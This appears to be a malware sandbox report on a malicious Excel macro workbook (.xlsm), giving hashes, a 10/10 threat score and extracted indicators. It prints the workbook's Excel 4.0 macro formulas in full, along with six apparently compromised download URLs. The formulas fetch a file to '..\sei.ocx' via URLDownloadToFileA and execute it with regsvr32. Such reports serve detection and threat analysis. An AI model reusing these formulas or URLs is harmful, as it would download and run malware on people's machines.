General
-
Target
7bc1973c947b9d36a72e86ea4d922c14abbfd356c67bd69b5c6644497fd3587f
-
Size
46KB
-
Sample
241120-dth83szgpr
-
MD5
7b46d495e4e96202a1705c362e957e9f
-
SHA1
2a95df1280b7d7f9052e0e080e10700989e717c6
-
SHA256
7bc1973c947b9d36a72e86ea4d922c14abbfd356c67bd69b5c6644497fd3587f
-
SHA512
0e5f0e5977672a98d44d1332c086e93346fb238cb0519497b2f857561cc0772995563d5e7489b9df19afdd84c551146c16b4585539363bb94a580d264845a3c1
-
SSDEEP
768:31m2o0pOODOevZCwrvtTzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0Vf1V5f+:31HoadD3tT5fTR4Lh1NisFYBc3cr+Uqu
Behavioral task
behavioral1
Sample
7bc1973c947b9d36a72e86ea4d922c14abbfd356c67bd69b5c6644497fd3587f.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
7bc1973c947b9d36a72e86ea4d922c14abbfd356c67bd69b5c6644497fd3587f.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://rosywhitecleaningsolution.com/wp-admin/PqMw6fND8Bb1I4VPR10/
http://havilaholuemglobal.com/dofz29/ymIfCcEL8I5kjA6E/
http://www.floresguitarinstruction.com/wp-admin/jWlCX/
http://www.drcc.co.za/restoredcontent/nAKvnbRpazx7c/
http://aopda.org/wp-content/uploads/RDL75PME7OKHk4f/
https://chera.co.kr/wp-includes/i2nnUkDXZ/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://rosywhitecleaningsolution.com/wp-admin/PqMw6fND8Bb1I4VPR10/","..\sei.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://havilaholuemglobal.com/dofz29/ymIfCcEL8I5kjA6E/","..\sei.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.floresguitarinstruction.com/wp-admin/jWlCX/","..\sei.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.drcc.co.za/restoredcontent/nAKvnbRpazx7c/","..\sei.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/RDL75PME7OKHk4f/","..\sei.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chera.co.kr/wp-includes/i2nnUkDXZ/","..\sei.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx") =RETURN()
Extracted
http://rosywhitecleaningsolution.com/wp-admin/PqMw6fND8Bb1I4VPR10/
http://havilaholuemglobal.com/dofz29/ymIfCcEL8I5kjA6E/
http://www.floresguitarinstruction.com/wp-admin/jWlCX/
http://www.drcc.co.za/restoredcontent/nAKvnbRpazx7c/
http://aopda.org/wp-content/uploads/RDL75PME7OKHk4f/
Targets
-
-
Target
7bc1973c947b9d36a72e86ea4d922c14abbfd356c67bd69b5c6644497fd3587f
-
Size
46KB
-
MD5
7b46d495e4e96202a1705c362e957e9f
-
SHA1
2a95df1280b7d7f9052e0e080e10700989e717c6
-
SHA256
7bc1973c947b9d36a72e86ea4d922c14abbfd356c67bd69b5c6644497fd3587f
-
SHA512
0e5f0e5977672a98d44d1332c086e93346fb238cb0519497b2f857561cc0772995563d5e7489b9df19afdd84c551146c16b4585539363bb94a580d264845a3c1
-
SSDEEP
768:31m2o0pOODOevZCwrvtTzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0Vf1V5f+:31HoadD3tT5fTR4Lh1NisFYBc3cr+Uqu
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-